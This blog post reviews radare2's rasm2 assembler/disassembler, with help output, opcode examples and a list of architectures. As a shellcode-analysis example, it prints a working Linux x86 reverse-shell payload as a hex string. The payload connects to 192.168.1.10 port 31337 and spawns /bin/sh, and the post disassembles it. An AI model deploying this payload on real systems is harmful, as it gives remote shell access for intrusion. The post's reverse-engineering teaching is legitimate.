radare and the new radare2 are an open source reverse engineering framework, which can be found here:
http://radare.org/y/
It has quite a few tools, and the webpage has excellent documentation, which is pretty good. In this post I want to review the "rasm2" assembler / disassembler utility, which is one of the main tools in the package. It can work on hex streams, files, opcodes, etc... quite a few options, as we can see from the help:
root@kali:~# rasm2 -h
rasm2 [-e] [-o offset] [-a arch] [-s syntax] -d "opcode"|"hexpairs"|- [-f file ..]
-d Disassemble from hexpair bytes
-D Disassemble showing hexpair and opcode
-f Read data from file
-F [in:out] Specify input and/or output filters (att2intel, x86.pseudo, ...)
-o [offset] Set start address for code (0x08048000)
-a [arch] Set architecture plugin
-b [bits] Set architecture bits
-s [syntax] Select syntax (intel, att)
-B Binary input/output (-l is mandatory for binary input)
-l [int] Input/Output length
-C Output in C format
-L List supported asm plugins
-e Use big endian
-v Show version information
If '-l' value is greater than output length, output is padded with nops
If the last argument is '-' reads from stdin
Here are just a few random disassemble examples:
root@kali:~# rasm2 -d 90
nop
root@kali:~# rasm2 -d 53
push ebx
root@kali:~# rasm2 -d 44
inc esp
We can also reverse it:
root@kali:~# rasm2 "nop"
90
root@kali:~# rasm2 "nop;inc esp;push ebx"
904453
It supports quite a few formats:
root@kali:~# rasm2 -L
ad arm ARM disassembly plugin
ad armthumb ARM THUMB disassembly plugin
_d avr AVR Atmel disassembler
ad bf Brainfuck disassembly plugin
_d csr CSR disassembly plugin
ad dalvik Dalvik (Android VM) disassembly plugin
ad java Java CLASS assembler/disassembler
_d mips MIPS disassembly plugin
_d msil MSIL disassembly plugin
_d ppc PPC disassembly plugin
_d sh SH-4 disassembly plugin
_d sparc SPARC disassembly plugin
_d x86 udis86 disassembly plugin
a_ x86.nz x86 assembler with non-zeros
ad x86.olly X86 disassembly plugin (olly engine)
It's very useful for shellcode analysis. I took the following as an example:
Although the assembly is on the site, but rasm2 can also show it nicely:
root@kali:~# rasm2 -d 31c031db31c931d2b066b301516a066a016a0289e1cd8089c6b06631dbb30268c0a8010a66687a696653fec389e16a10515689e1cd8031c9b103fec9b03fcd8075f831c052686e2f7368682f2f626989e3525389e15289e2b00bcd80
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
mov al, 0x66
mov bl, 0x1
push ecx
push 0x6
push 0x1
push 0x2
mov ecx, esp
int 0x80
mov esi, eax
mov al, 0x66
xor ebx, ebx
mov bl, 0x2
push dword 0xa01a8c0
push word 0x697a
push bx
inc bl
mov ecx, esp
push 0x10
push ecx
push esi
mov ecx, esp
int 0x80
xor ecx, ecx
mov cl, 0x3
dec cl
mov al, 0x3f
int 0x80
jnz 0x804803a
xor eax, eax
push edx
push dword 0x68732f6e
push dword 0x69622f2f
mov ebx, esp
push edx
push ebx
mov ecx, esp
push edx
mov edx, esp
mov al, 0xb
int 0x80
We can also specify an offset if we now where the given command will be in memory:
root@kali:~# rasm2 -o 0x8048060 "call 0x09080706"
e8a1860301
root@kali:~# rasm2 -o 0x8048060 -d e8a1860301
call dword 0x9080706
No comments:
Post a Comment